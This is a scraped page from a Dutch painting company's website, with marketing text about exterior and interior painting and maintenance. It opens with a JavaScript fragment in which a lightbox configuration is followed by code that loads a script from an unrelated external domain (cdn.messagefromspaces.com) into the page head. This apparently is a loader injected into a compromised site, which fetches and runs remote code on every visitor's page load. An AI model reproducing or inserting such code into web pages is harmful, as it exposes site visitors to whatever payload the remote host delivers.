, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
boog
AF erkend
Wij gaan voor lange termijn relaties waarbij een uitstekende dienstverlening en een lange duurzaamheid van onze geleverde diensten bepalende factoren zijn. Tevens geven wij heldere adviezen en maken transparante offertes.
boog

Schilderen

Het is belangrijk uw schilderwerk goed te onderhouden. Slecht of onregelmatig onderhoud, zorgt meestal voor onnodig hoge kosten. Achterstallig onderhoud kan bijvoorbeeld leiden tot houtrot. Uiteraard kunnen wij dit ook voor u repareren, maar voorkomen is beter dan genezen. Ook is de kwaliteit van uw binnenschilderwerk van invloed op uw buitenschilderwerk.
Wij controleren beide graag voor u.

Buitenschilderwerk
Het schilderen van de buitenkant van uw woning of bedrijfspand is geen gemakkelijke klus. Het vraagt veel tijd en aandacht en vaak zijn hooggelegen delen moeilijk te bereiken. Laat het daarom over aan de vakman. Wij beschikken over de juiste kennis en ervaring, klimmaterialen en werken met professionele verfsystemen.

Binnenschilderwerk
Bij binnenschilderwerk gaat het vooral om uw interieur. Wij adviseren u graag over kleur en verfsoort. Daarnaast houden wij ook rekening met milieu en gezondheid. Wij gebruiken voor uw binnenschilderwerk bijvoorbeeld oplosmiddelarme verf.